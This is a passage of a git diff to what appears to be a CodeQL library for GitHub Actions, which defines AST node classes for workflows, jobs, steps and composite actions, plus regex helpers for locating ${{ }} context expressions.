stepsCtxRegex() { - result = wrapRegexp("steps\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)") -} - -private string needsCtxRegex() { - result = wrapRegexp("needs\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)") -} - -private string jobsCtxRegex() { - result = wrapRegexp("jobs\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)") -} - -private string envCtxRegex() { result = wrapRegexp("env\\.([A-Za-z0-9_-]+)") } - -private string matrixCtxRegex() { result = wrapRegexp("matrix\\.([A-Za-z0-9_-]+)") } - -private string inputsCtxRegex() { - result = wrapRegexp(["inputs\\.([A-Za-z0-9_-]+)", "github\\.event\\.inputs\\.([A-Za-z0-9_-]+)"]) -} - -bindingset[regex] -private string wrapRegexp(string regex) { - result = ["\\b" + regex + "\\b", "fromJSON\\(" + regex + "\\)", "toJSON\\(" + regex + "\\)"] -} - -/** - * Holds for an 
expression accesing the `steps` context.
- * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability
- * e.g. `${{ steps.changed-files.outputs.all_changed_files }}`
- */
-class StepsExpression extends ContextExpression {
- string stepId;
- string fieldName;
-
- StepsExpression() {
- expression.regexpMatch(stepsCtxRegex()) and
- stepId = expression.regexpCapture(stepsCtxRegex(), 1) and
- fieldName = expression.regexpCapture(stepsCtxRegex(), 2)
- }
-
- override string getFieldName() { result = fieldName }
-
- override AstNode getTarget() {
- this.getFile() = result.getFile() and
- result.(Step).getId() = stepId
- }
-}
-
-/**
- * Holds for an expression accesing the `needs` context.
- * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability
- * e.g. `${{ needs.job1.outputs.foo}}`
- */
-class NeedsExpression extends ContextExpression {
- Job neededJob;
- string neededJobId;
- string fieldName;
-
- NeedsExpression() {
- expression.regexpMatch(needsCtxRegex()) and
- neededJobId = expression.regexpCapture(needsCtxRegex(), 1) and
- fieldName = expression.regexpCapture(needsCtxRegex(), 2) and
- neededJob.getId() = neededJobId
- }
-
- predicate usesReusableWorkflow() { neededJob.usesReusableWorkflow() }
-
- override string getFieldName() { result = fieldName }
-
- override AstNode getTarget() {
- neededJob.getFile() = this.getFile() and
- this.getJob().getANeededJob() = neededJob and
- (
- // regular jobs
- neededJob.getOutputs() = result
- or
- // reusable workflow calling jobs
- neededJob.getUses() = result
- )
- }
-}
-
-/**
- * Holds for an expression accesing the `jobs` context.
- * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability
- * e.g. `${{ jobs.job1.outputs.foo}}` (within reusable workflows)
- */
-class JobsExpression extends ContextExpression {
- string jobId;
- string fieldName;
-
- JobsExpression() {
- expression.regexpMatch(jobsCtxRegex()) and
- jobId = expression.regexpCapture(jobsCtxRegex(), 1) and
- fieldName = expression.regexpCapture(jobsCtxRegex(), 2)
- }
-
- override string getFieldName() { result = fieldName }
-
- override AstNode getTarget() {
- exists(Job job |
- job.getId() = jobId and
- job.getFile() = this.getFile() and
- job.getOutputs() = result
- )
- }
-}
-
-/**
- * Holds for an expression the `inputs` context.
- * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability
- * e.g. `${{ inputs.foo }}`
- */
-class InputsExpression extends ContextExpression {
- string fieldName;
-
- InputsExpression() {
- expression.regexpMatch(inputsCtxRegex()) and
- fieldName = expression.regexpCapture(inputsCtxRegex(), 1)
- }
-
- override string getFieldName() { result = fieldName }
-
- override AstNode getTarget() {
- result.getFile() = this.getFile() and
- (
- exists(ReusableWorkflow w | w.getInput(fieldName) = result)
- or
- exists(CompositeAction a | a.getInput(fieldName) = result)
- )
- }
-}
-
-/**
- * Holds for an expression accesing the `env` context.
- * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability
- * e.g. `${{ env.foo }}`
- */
-class EnvExpression extends ContextExpression {
- string fieldName;
-
- EnvExpression() {
- expression.regexpMatch(envCtxRegex()) and
- fieldName = expression.regexpCapture(envCtxRegex(), 1)
- }
-
- override string getFieldName() { result = fieldName }
-
- override AstNode getTarget() {
- exists(WorkflowNode s |
- s.getInScopeEnvVarExpr(fieldName) = result and
- s.getAChildNode*() = this
- )
- }
-}
-
-/**
- * Holds for an expression accesing the `matrix` context.
- * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability
- * e.g. `${{ matrix.foo }}`
- */
-class MatrixExpression extends ContextExpression {
- string fieldName;
-
- MatrixExpression() {
- expression.regexpMatch(matrixCtxRegex()) and
- fieldName = expression.regexpCapture(matrixCtxRegex(), 1)
- }
-
- override string getFieldName() { result = fieldName }
-
- override AstNode getTarget() {
- exists(Workflow w |
- w.getStrategy().getMatrixVar(fieldName) = result and
- w.getAChildNode*() = this
- )
- or
- exists(Job j |
- j.getStrategy().getMatrixVar(fieldName) = result and
- j.getAChildNode*() = this
- )
- }
-}
+class MatrixExpression extends ContextExpression instanceof MatrixExpressionImpl { }
diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll
new file mode 100644
index 00000000000..63b25229a58
--- /dev/null
+++ b/ql/lib/codeql/actions/ast/internal/Ast.qll
@@ -0,0 +1,1001 @@ +private import codeql.actions.ast.internal.Yaml +private import codeql.Locations + +/** + * Gets the length of each line in the StringValue . + */ +bindingset[text] +int lineLength(string text, int idx) { + exists(string line | line = text.splitAt("\n", idx) and result = line.length() + 1) +} + +/** + * Gets the sum of the length of the lines up to the given index. + */ +bindingset[text] +int partialLineLengthSum(string text, int i) { + i in [0 .. count(text.splitAt("\n"))] and + result = sum(int j, int length | j in [0 .. i] and length = lineLength(text, j) | length) +} + +/** + * Holds if `${{ e }}` is a GitHub Actions expression evaluated within this YAML string. + * See https://docs.github.com/en/free-pro-team@latest/actions/reference/context-and-expression-syntax-for-github-actions. + * Only finds simple expressions like `${{ github.event.comment.body }}`, where the expression contains only alphanumeric characters, underscores, dots, or dashes. + * Does not identify more complicated expressions like `${{ fromJSON(env.time) }}`, or ${{ format('{{Hello {0}!}}', github.event.head_commit.author.name) }} + */ +string getASimpleReferenceExpression(YamlString s, int offset) { + // We use `regexpFind` to obtain *all* matches of `${{...}}`, + // not just the last (greedy match) or first (reluctant match). 
+ result = + s.getValue() + .regexpFind("\\$\\{\\{\\s*[A-Za-z0-9_\\[\\]\\*\\(\\)\\.\\-]+\\s*\\}\\}", _, offset) + .regexpCapture("(\\$\\{\\{\\s*[A-Za-z0-9_\\[\\]\\*\\((\\)\\.\\-]+\\s*\\}\\})", 1) +} + +private newtype TAstNode = + TExpressionNode(YamlNode key, YamlScalar value, string raw, int exprOffset) { + raw = getASimpleReferenceExpression(value, exprOffset) and + exists(YamlMapping m | + ( + exists(int i | value = m.getValueNode(i) and key = m.getKeyNode(i)) + or + exists(int i | + m.getValueNode(i).(YamlSequence).getElementNode(_) = value and key = m.getKeyNode(i) + ) + ) + ) + } or + TCompositeAction(YamlMapping n) { + n instanceof YamlDocument and + n.getFile().getBaseName() = ["action.yml", "action.yaml"] and + n.lookup("runs").(YamlMapping).lookup("using").(YamlScalar).getValue() = "composite" + } or + TWorkflowNode(YamlMapping n) { + n instanceof YamlDocument and + n.lookup("jobs") instanceof YamlMapping + } or + TRunsNode(YamlMapping n) { exists(CompositeActionImpl a | a.getNode().lookup("runs") = n) } or + TInputsNode(YamlMapping n) { exists(YamlMapping m | m.lookup("inputs") = n) } or + TInputNode(YamlValue n) { exists(YamlMapping m | m.lookup("inputs").(YamlMapping).maps(n, _)) } or + TOutputsNode(YamlMapping n) { exists(YamlMapping m | m.lookup("outputs") = n) } or + TPermissionsNode(YamlMapping n) { exists(YamlMapping m | m.lookup("permissions") = n) } or + TStrategyNode(YamlMapping n) { exists(YamlMapping m | m.lookup("strategy") = n) } or + TNeedsNode(YamlMappingLikeNode n) { exists(YamlMapping m | m.lookup("needs") = n) } or + TJobNode(YamlMapping n) { exists(YamlMapping w | w.lookup("jobs").(YamlMapping).lookup(_) = n) } or + TStepNode(YamlMapping n) { + exists(YamlMapping m | m.lookup("steps").(YamlSequence).getElementNode(_) = n) + } or + TIfNode(YamlValue n) { exists(YamlMapping m | m.lookup("if") = n) } or + TEnvNode(YamlMapping n) { exists(YamlMapping m | m.lookup("env") = n) } or + TScalarValueNode(YamlScalar n) { + exists(YamlMapping m 
| m.maps(_, n) or m.lookup(_).(YamlSequence).getElementNode(_) = n) + } + +abstract class AstNodeImpl extends TAstNode { + abstract AstNodeImpl getAChildNode(); + + abstract AstNodeImpl getParentNode(); + + abstract string getAPrimaryQlClass(); + + abstract Location getLocation(); + + abstract YamlNode getNode(); + + abstract string toString(); + + /** + * Gets the enclosing Job. + */ + JobImpl getEnclosingJob() { result.getAChildNode*() = this.getParentNode() } + + /** + * Gets the enclosing workflow statement. + */ + WorkflowImpl getEnclosingWorkflow() { this = result.getAChildNode*() } + + /** + * Gets a environment variable expression by name in the scope of the current node. + */ + ExpressionImpl getInScopeEnvVarExpr(string name) { + exists(EnvImpl env | + env.getNode().maps(any(YamlScalar s | s.getValue() = name), result.getParentNode().getNode()) and + env.getParentNode().getAChildNode*() = this + ) + } +} + +class ScalarValueImpl extends AstNodeImpl, TScalarValueNode { + YamlScalar value; + + ScalarValueImpl() { this = TScalarValueNode(value) } + + override string toString() { result = value.getValue() } + + override ExpressionImpl getAChildNode() { result.getParentNode() = this } + + override AstNodeImpl getParentNode() { + exists(AstNodeImpl n | n.getAChildNode() = this and result = n) + } + + override string getAPrimaryQlClass() { result = "ScalarValueImpl" } + + override Location getLocation() { result = value.getLocation() } + + override YamlNode getNode() { result = value } +} + +class ExpressionImpl extends AstNodeImpl, TExpressionNode { + YamlNode key; + YamlString value; + string rawExpression; + string expression; + int exprOffset; + + ExpressionImpl() { + this = TExpressionNode(key, value, rawExpression, exprOffset - 1) and + expression = + rawExpression.regexpCapture("\\$\\{\\{\\s*([A-Za-z0-9_\\[\\]\\*\\((\\)\\.\\-]+)\\s*\\}\\}", 1) + } + + override string toString() { result = expression } + + override AstNodeImpl getAChildNode() { none() } + + 
override AstNodeImpl getParentNode() { result.getNode() = value } + + override string getAPrimaryQlClass() { result = "ExpressionNode" } + + override YamlNode getNode() { none() } + + string getExpression() { result = expression } + + string getRawExpression() { result = rawExpression } + + /** + * Gets the absolute coordinates of the expression. + */ + predicate expressionLocation(int sl, int sc, int el, int ec) { + exists(int lineDiff, string text, string style, Location loc | + text = value.getValue() and + loc = value.getLocation() and + lineDiff = loc.getEndLine() - loc.getStartLine() and + style = value.getStyle() + | + // eg: + // - run: echo "hello" + // - run: 'echo "hello"' + // - run: "echo 'hello'" + style = ["", "\"", "'"] and + lineDiff = 0 and + sl = loc.getStartLine() and + el = sl and + sc = loc.getStartColumn() + exprOffset and + ec = sc + rawExpression.length() - 1 + or + // eg: + // - run: "echo 'hello' + // echo 'hello'" + // - run: "echo 'hello' + // echo 'hello' + // echo 'hello'" + style = ["", "\"", "'"] and + lineDiff > 0 and + sl = loc.getStartLine() and + el = loc.getEndLine() and + sc = loc.getStartColumn() and + ec = loc.getEndColumn() + or + // eg: + // - run: | + // echo "hello" + // - run: | + // echo "hello" + // echo "bye" + style = "|" and + exists(int r | + ( + r > 0 and + partialLineLengthSum(text, r - 1) < exprOffset and + partialLineLengthSum(text, r) >= exprOffset and + sl = loc.getStartLine() + r + 1 and + el = sl and + sc = + key.getLocation().getStartColumn() + exprOffset - partialLineLengthSum(text, r - 1) + 2 - + 1 and + ec = sc + rawExpression.length() - 1 + or + r = 0 and + partialLineLengthSum(text, r) > exprOffset and + sl = loc.getStartLine() + r + 1 and + el = sl and + sc = key.getLocation().getStartColumn() + 2 + exprOffset and + ec = sc + rawExpression.length() - 1 + ) + ) + or + // eg: + // - run: > + // echo "hello" + // - run: > + // echo "hello" + // echo "hello" + style = ">" and + sl = loc.getStartLine() + 
1 and + el = loc.getEndLine() and + sc = key.getLocation().getStartColumn() and + ec = loc.getEndColumn() + ) + } + + override Location getLocation() { + exists(Location loc | + this.hasLocationInfo(loc.getFile().getAbsolutePath(), loc.getStartLine(), + loc.getStartColumn(), loc.getEndLine(), loc.getEndColumn()) and + result = loc + ) + } + + predicate hasLocationInfo(string path, int sl, int sc, int el, int ec) { + path = value.getFile().getAbsolutePath() and + this.expressionLocation(sl, sc, el, ec) + } +} + +class CompositeActionImpl extends AstNodeImpl, TCompositeAction { + YamlMapping n; + + CompositeActionImpl() { this = TCompositeAction(n) } + + override string toString() { result = n.toString() } + + override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } + + // override AstNodeImpl getAChildNode() { + // result = this.getInputs() or + // result = this.getOutputs() or + // result = this.getRuns() + // } + override AstNodeImpl getParentNode() { none() } + + override string getAPrimaryQlClass() { result = "CompositeActionImpl" } + + override Location getLocation() { result = n.getLocation() } + + override YamlMapping getNode() { result = n } + + RunsImpl getRuns() { result.getNode() = n.lookup("runs") } + + OutputsImpl getOutputs() { result.getNode() = n.lookup("outputs") } + + ExpressionImpl getAnOutputExpr() { result = this.getOutputs().getAnOutputExpr() } + + ExpressionImpl getOutputExpr(string name) { result = this.getOutputs().getOutputExpr(name) } + + InputsImpl getInputs() { result.getNode() = n.lookup("inputs") } + + InputImpl getAnInput() { n.lookup("inputs").(YamlMapping).maps(result.getNode(), _) } + + InputImpl getInput(string name) { + n.lookup("inputs").(YamlMapping).maps(result.getNode(), _) and + result.getNode().getValue() = name + } +} + +class WorkflowImpl extends AstNodeImpl, TWorkflowNode { + YamlMapping n; + + WorkflowImpl() { this = TWorkflowNode(n) } + + override string toString() { result = n.toString() } + + 
override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } + + // override AstNodeImpl getAChildNode() { + // result = this.getAJob() or + // result = this.getStrategy() or + // result = this.getEnv() or + // result = this.getPermissions() + // } + override AstNodeImpl getParentNode() { none() } + + override string getAPrimaryQlClass() { result = "WorkflowImpl" } + + override Location getLocation() { result = n.getLocation() } + + override YamlMapping getNode() { result = n } + + // /** Gets the `jobs` mapping from job IDs to job definitions in this workflow. */ + // YamlMapping getJobs() { result = this.asYamlMapping().lookup("jobs") } + /** Gets the 'global' `env` mapping in this workflow. */ + EnvImpl getEnv() { result.getNode() = n.lookup("env") } + + /** Gets the name of the workflow. */ + string getName() { result = n.lookup("name").(YamlString).getValue() } + + /** Gets the job within this workflow with the given job ID. */ + JobImpl getJob(string jobId) { result.getWorkflow() = this and result.getId() = jobId } + + /** Gets a job within this workflow */ + JobImpl getAJob() { result = this.getJob(_) } + + /** Workflow is triggered by given trigger event */ + predicate hasTriggerEvent(string trigger) { + exists(YamlNode y | y = n.lookup("on").(YamlMappingLikeNode).getNode(trigger)) + } + + /** Gets the trigger event that starts this workflow. */ + string getATriggerEvent() { + exists(YamlNode y | y = n.lookup("on").(YamlMappingLikeNode).getNode(result)) + } + + /** Gets the permissions granted to this workflow. */ + PermissionsImpl getPermissions() { result.getNode() = n.lookup("permissions") } + + /** Gets the strategy for this workflow. 
*/ + StrategyImpl getStrategy() { result.getNode() = n.lookup("strategy") } +} + +class ReusableWorkflowImpl extends AstNodeImpl, WorkflowImpl { + YamlValue workflow_call; + + ReusableWorkflowImpl() { + n.lookup("on").(YamlMappingLikeNode).getNode("workflow_call") = workflow_call + } + + override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } + + // override AstNodeImpl getAChildNode() { + // result = super.getAChildNode() or + // result = this.getInputs() or + // result = this.getOutputs() + // } + OutputsImpl getOutputs() { result.getNode() = workflow_call.(YamlMapping).lookup("outputs") } + + ExpressionImpl getAnOutputExpr() { result = this.getOutputs().getAnOutputExpr() } + + ExpressionImpl getOutputExpr(string name) { result = this.getOutputs().getOutputExpr(name) } + + InputsImpl getInputs() { result.getNode() = workflow_call.(YamlMapping).lookup("inputs") } + + InputImpl getAnInput() { + workflow_call.(YamlMapping).lookup("inputs").(YamlMapping).maps(result.getNode(), _) + } + + InputImpl getInput(string name) { + workflow_call.(YamlMapping).lookup("inputs").(YamlMapping).maps(result.getNode(), _) and + result.getNode().(YamlString).getValue() = name + } +} + +class RunsImpl extends AstNodeImpl, TRunsNode { + YamlMapping n; + + RunsImpl() { this = TRunsNode(n) } + + override string toString() { result = n.toString() } + + override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } + + //override AstNodeImpl getAChildNode() { result = this.getAStep() } + override CompositeActionImpl getParentNode() { result.getAChildNode() = this } + + override string getAPrimaryQlClass() { result = "RunsImpl" } + + override Location getLocation() { result = n.getLocation() } + + override YamlMapping getNode() { result = n } + + /** Gets the action that this `runs` mapping is in. */ + CompositeActionImpl getAction() { result = this.getParentNode() } + + /** Gets any steps that are defined within this job. 
*/ + StepImpl getAStep() { result.getNode() = n.lookup("steps").(YamlSequence).getElementNode(_) } + + /** Gets the step at the given index within this job. */ + StepImpl getStep(int i) { result.getNode() = n.lookup("steps").(YamlSequence).getElementNode(i) } +} + +class InputsImpl extends AstNodeImpl, TInputsNode { + YamlMapping n; + + InputsImpl() { this = TInputsNode(n) } + + override string toString() { result = n.toString() } + + override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } + + //override AstNodeImpl getAChildNode() { result = this.getAnInput() } + override AstNodeImpl getParentNode() { result.getAChildNode() = this } + + override string getAPrimaryQlClass() { result = "InputsImpl" } + + override Location getLocation() { result = n.getLocation() } + + override YamlMapping getNode() { result = n } + + InputImpl getAnInput() { n.maps(result.getNode(), _) } + + InputImpl getInput(string name) { + n.maps(result.getNode(), _) and + result.getNode().(YamlString).getValue() = name + } +} + +class InputImpl extends AstNodeImpl, TInputNode { + YamlValue n; + + InputImpl() { this = TInputNode(n) } + + override string toString() { result = n.toString() } + + override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } + + override InputsImpl getParentNode() { result.getAChildNode() = this } + + override string getAPrimaryQlClass() { result = "InputImpl" } + + override Location getLocation() { result = n.getLocation() } + + override YamlScalar getNode() { result = n } +} + +class OutputsImpl extends AstNodeImpl, TOutputsNode { + YamlMapping n; + + OutputsImpl() { this = TOutputsNode(n) } + + override string toString() { result = n.toString() } + + override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } + + //override AstNodeImpl getAChildNode() { result = this.getAnOutputExpr() } + override AstNodeImpl getParentNode() { result.getAChildNode() = this } + + override string getAPrimaryQlClass() { 
result = "OutputsImpl" } + + override Location getLocation() { result = n.getLocation() } + + override YamlMapping getNode() { result = n } + + /** Gets an output expression. */ + ExpressionImpl getAnOutputExpr() { result = this.getOutputExpr(_) } + + /** Gets a specific output expression by name. */ + ExpressionImpl getOutputExpr(string name) { + exists(YamlScalar l | + l = result.getParentNode().getNode() and + ( + n.lookup(name).(YamlMapping).lookup("value") = l or + n.lookup(name) = l + ) + ) + } + + string getAnOutputName() { n.maps(any(YamlString s | s.getValue() = result), _) } +} + +class PermissionsImpl extends AstNodeImpl, TPermissionsNode { + YamlMapping n; + + PermissionsImpl() { this = TPermissionsNode(n) } + + override string toString() { result = n.toString() } + + override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } + + override AstNodeImpl getParentNode() { result.getAChildNode() = this } + + override string getAPrimaryQlClass() { result = "PermissionsImpl" } + + override Location getLocation() { result = n.getLocation() } + + override YamlMapping getNode() { result = n } +} + +class StrategyImpl extends AstNodeImpl, TStrategyNode { + YamlMapping n; + + StrategyImpl() { this = TStrategyNode(n) } + + override string toString() { result = n.toString() } + + override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } + + //override ExpressionImpl getAChildNode() { result = this.getAMatrixVarExpr() } + override AstNodeImpl getParentNode() { result.getAChildNode() = this } + + override string getAPrimaryQlClass() { result = "StrategyImpl" } + + override Location getLocation() { result = n.getLocation() } + + override YamlMapping getNode() { result = n } + + /** Gets a specific matric expression (YamlMapping) by name. */ + ExpressionImpl getMatrixVarExpr(string name) { + n.lookup("matrix").(YamlMapping).lookup(name) = result.getNode() + } + + /** Gets a specific matric expression (YamlMapping) by name. 
*/ + ExpressionImpl getAMatrixVarExpr() { + n.lookup("matrix").(YamlMapping).lookup(_) = result.getNode() + } +} + +class NeedsImpl extends AstNodeImpl, TNeedsNode { + YamlMappingLikeNode n; + + NeedsImpl() { this = TNeedsNode(n) } + + override string toString() { result = n.toString() } + + override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } + + override JobImpl getParentNode() { result.getNode().lookup("needs") = n } + + override string getAPrimaryQlClass() { result = "NeedsImpl" } + + override Location getLocation() { result = n.getLocation() } + + override YamlMappingLikeNode getNode() { result = n } + + /** Gets a job that needs to be run before the job defining these needs. */ + JobImpl getANeededJob() { + result.getId() = n.getNode(_).(YamlString).getValue() and + result.getLocation().getFile() = n.getLocation().getFile() + } +} + +class JobImpl extends AstNodeImpl, TJobNode { + YamlMapping n; + string jobId; + WorkflowImpl workflow; + + JobImpl() { + this = TJobNode(n) and + workflow.getNode().lookup("jobs").(YamlMapping).lookup(jobId) = n + } + + // TODO: REMOVE + override string toString() { result = "Job: " + jobId } + + //override string toString() { result = n.toString() } + override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } + + override WorkflowImpl getParentNode() { result.getAChildNode() = this } + + override string getAPrimaryQlClass() { result = "JobImpl" } + + override Location getLocation() { result = n.getLocation() } + + override YamlMapping getNode() { result = n } + + /** Gets the ID of this job, as a string. */ + string getId() { result = jobId } + + /** Gets the workflow this job belongs to. */ + WorkflowImpl getWorkflow() { result = workflow } + + EnvImpl getEnv() { result.getNode() = n.lookup("env") } + + /** Gets a needed job. 
*/ + JobImpl getANeededJob() { + exists(NeedsImpl needs | + needs.getParentNode() = this and + result = needs.getANeededJob() + ) + } + + /** Gets the declaration of the outputs for the job. */ + OutputsImpl getOutputs() { result.getNode() = n.lookup("outputs") } + + /** Gets a Job output expression. */ + ExpressionImpl getAnOutputExpr() { result = this.getOutputs().getAnOutputExpr() } + + /** Gets a Job output expression given its name. */ + ExpressionImpl getOutputExpr(string name) { result = this.getOutputs().getOutputExpr(name) } + + /** Gets the condition that must be satisfied for this job to run. */ + IfImpl getIf() { result.getNode() = n.lookup("if") } + + /** Gets the permissions for this job. */ + PermissionsImpl getPermissions() { result.getNode() = n.lookup("permissions") } + + /** Gets the strategy for this job. */ + StrategyImpl getStrategy() { result.getNode() = n.lookup("strategy") } +} + +class LocalJobImpl extends JobImpl { + LocalJobImpl() { n.maps(any(YamlString s | s.getValue() = "steps"), _) } + + /** Gets any steps that are defined within this job. */ + StepImpl getAStep() { result.getNode() = n.lookup("steps").(YamlSequence).getElementNode(_) } + + /** Gets the step at the given index within this job. */ + StepImpl getStep(int i) { result.getNode() = n.lookup("steps").(YamlSequence).getElementNode(i) } +} + +class StepImpl extends AstNodeImpl, TStepNode { + YamlMapping n; + + StepImpl() { this = TStepNode(n) } + + override string toString() { result = n.toString() } + + override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } + + override JobImpl getParentNode() { result.getAChildNode() = this } + + override string getAPrimaryQlClass() { result = "StepImpl" } + + override Location getLocation() { result = n.getLocation() } + + override YamlMapping getNode() { result = n } + + EnvImpl getEnv() { result.getNode() = n.lookup("env") } + + /** Gets the ID of this step, if any. 
*/ + string getId() { result = n.lookup("id").(YamlString).getValue() } + + /** Gets the value of the `if` field in this step, if any. */ + IfImpl getIf() { result.getNode() = n.lookup("if") } +} + +class IfImpl extends AstNodeImpl, TIfNode { + YamlValue n; + + IfImpl() { this = TIfNode(n) } + + override string toString() { result = n.toString() } + + override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } + + override AstNodeImpl getParentNode() { result.getAChildNode() = this } + + override string getAPrimaryQlClass() { result = "IfImpl" } + + override Location getLocation() { result = n.getLocation() } + + override YamlScalar getNode() { result = n } + + /** Gets the condition that must be satisfied for this job to run. */ + string getCondition() { result = n.(YamlScalar).getValue() } +} + +class EnvImpl extends AstNodeImpl, TEnvNode { + YamlMapping n; + + EnvImpl() { this = TEnvNode(n) } + + override string toString() { result = n.toString() } + + override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } + + override AstNodeImpl getParentNode() { + result.(JobImpl).getEnv() = this or + result.(StepImpl).getEnv() = this or + result.(WorkflowImpl).getEnv() = this + } + + override string getAPrimaryQlClass() { result = "EnvImpl" } + + override Location getLocation() { result = n.getLocation() } + + override YamlMapping getNode() { result = n } + + /** Gets an environment variable value given its name. */ + ScalarValueImpl getEnvVarValue(string name) { n.lookup(name) = result.getNode() } + + /** Gets an environment variable value. */ + ScalarValueImpl getAnEnvVarValue() { n.lookup(_) = result.getNode() } + + /** Gets an environment variable expressin given its name. */ + ExpressionImpl getEnvVarExpr(string name) { n.lookup(name) = result.getParentNode().getNode() } + + /** Gets an environment variable expression. 
*/ + ExpressionImpl getAnEnvVarExpr() { n.lookup(_) = result.getParentNode().getNode() } +} + +abstract class UsesImpl extends AstNodeImpl { + abstract string getCallee(); + + abstract string getVersion(); + + abstract ExpressionImpl getArgumentExpr(string key); +} + +/** + * Gets a regular expression that parses an `owner/repo@version` reference within a `uses` field in an Actions job step. + * The capture groups are: + * 1: The owner of the repository where the Action comes from, e.g. `actions` in `actions/checkout@v2` + * 2: The name of the repository where the Action comes from, e.g. `checkout` in `actions/checkout@v2`. + * 3: The version reference used when checking out the Action, e.g. `v2` in `actions/checkout@v2`. + */ +private string usesParser() { result = "([^/]+)/([^/@]+)@(.+)" } + +/** A Uses step represents a call to an action that is defined in a GitHub repository. */ +class UsesStepImpl extends StepImpl, UsesImpl { + YamlScalar u; + + UsesStepImpl() { this.getNode().lookup("uses") = u } + + override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } + + /** Gets the owner and name of the repository where the Action comes from, e.g. `actions/checkout` in `actions/checkout@v2`. */ + override string getCallee() { + result = + ( + u.getValue().regexpCapture(usesParser(), 1) + "/" + + u.getValue().regexpCapture(usesParser(), 2) + ).toLowerCase() + } + + /** Gets the version reference used when checking out the Action, e.g. `v2` in `actions/checkout@v2`. */ + override string getVersion() { result = u.getValue().regexpCapture(usesParser(), 3) } + + /** Gets the argument expression for the given key. 
*/ + override ExpressionImpl getArgumentExpr(string key) { + result.getParentNode().getNode() = n.lookup("with").(YamlMapping).lookup(key) + } + + // TODO: REMOVE + override string toString() { + if exists(this.getId()) then result = "Uses Step: " + this.getId() else result = "Uses Step" + } +} + +/** + * Gets a regular expression that parses an `owner/repo@version` reference within a `uses` field in an Actions job step. + * local repo: octo-org/this-repo/.github/workflows/workflow-1.yml@172239021f7ba04fe7327647b213799853a9eb89 + * local repo: ./.github/workflows/workflow-2.yml + * remote repo: octo-org/another-repo/.github/workflows/workflow.yml@v1 + */ +private string repoUsesParser() { result = "([^/]+)/([^/]+)/([^@]+)@(.+)" } + +private string pathUsesParser() { result = "\\./(.+)" } + +class ExternalJobImpl extends JobImpl, UsesImpl { + YamlScalar u; + + ExternalJobImpl() { n.lookup("uses") = u } + + //override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } + override string getCallee() { + if u.getValue().matches("./%") + then result = u.getValue().regexpCapture(pathUsesParser(), 1) + else + result = + u.getValue().regexpCapture(repoUsesParser(), 1) + "/" + + u.getValue().regexpCapture(repoUsesParser(), 2) + "/" + + u.getValue().regexpCapture(repoUsesParser(), 3) + } + + /** Gets the version reference used when checking out the Action, e.g. `v2` in `actions/checkout@v2`. */ + override string getVersion() { + exists(YamlString name | + n.lookup("uses") = name and + if not name.getValue().matches("\\.%") + then result = name.getValue().regexpCapture(repoUsesParser(), 4) + else none() + ) + } + + /** Gets the argument expression for the given key. 
*/ + override ExpressionImpl getArgumentExpr(string key) { + result.getParentNode().getNode() = n.lookup("with").(YamlMapping).lookup(key) + } +} + +class RunImpl extends StepImpl { + YamlScalar script; + + RunImpl() { this.getNode().lookup("run") = script } + + string getScript() { result = script.getValue() } + + ExpressionImpl getAnScriptExpr() { result.getParentNode().getNode() = script } + + // TODO: REMOVE + override string toString() { + if exists(this.getId()) then result = "Run Step: " + this.getId() else result = "Run Step" + } +} + +/** + * A ${{}} expression accessing a context variable such as steps, needs, jobs, env, inputs, or matrix. + * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability + */ +abstract class ContextExpressionImpl extends ExpressionImpl { + // TODO: REMOVE + // ContextExpressionImpl() { + // expression + // .regexpMatch([ + // stepsCtxRegex(), needsCtxRegex(), jobsCtxRegex(), envCtxRegex(), inputsCtxRegex(), + // matrixCtxRegex() + // ]) + // } + abstract string getFieldName(); + + abstract AstNodeImpl getTarget(); +} + +private string stepsCtxRegex() { + result = wrapRegexp("steps\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)") +} + +private string needsCtxRegex() { + result = wrapRegexp("needs\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)") +} + +private string jobsCtxRegex() { + result = wrapRegexp("jobs\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)") +} + +private string envCtxRegex() { result = wrapRegexp("env\\.([A-Za-z0-9_-]+)") } + +private string matrixCtxRegex() { result = wrapRegexp("matrix\\.([A-Za-z0-9_-]+)") } + +private string inputsCtxRegex() { + result = wrapRegexp(["inputs\\.([A-Za-z0-9_-]+)", "github\\.event\\.inputs\\.([A-Za-z0-9_-]+)"]) +} + +bindingset[regex] +private string wrapRegexp(string regex) { + result = ["\\b" + regex + "\\b", "fromJSON\\(" + regex + "\\)", "toJSON\\(" + regex + "\\)"] +} + +/** + * Holds for an expression accesing the `steps` context. 
